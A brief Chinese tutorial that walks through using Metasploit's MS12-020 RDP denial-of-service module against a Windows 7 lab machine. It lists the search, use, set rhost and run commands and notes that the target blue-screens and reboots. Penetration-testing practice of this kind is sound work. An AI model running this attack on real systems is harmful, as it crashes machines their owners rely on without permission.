利用msf对MS12-020漏洞进行渗透测试
工具:metasploit
靶机:windows 7 专业版 开启允许远程桌面连接(3389)
主要是复用已知的exploitcode(漏洞)代码对系统进行利用(渗透测试)
第一次使用建议在桌面直接打开,不要在终端上打开,因为首次使用该工具会初始化数据 。
选项
banner 显示Logo
search 关键字 利用search搜索可利用的漏洞
search ms12-020 搜索ms12-020漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 应用模块
show options 显示选项
【kali linux中文教程 kali linux教程】
set + 选项名
set rhost 被攻击者ip 例如:set rhost 192.168.10.110
run 对ip的ms12-020漏洞进行攻击
被攻击者蓝屏重启
show auxiliary 显示辅助模块
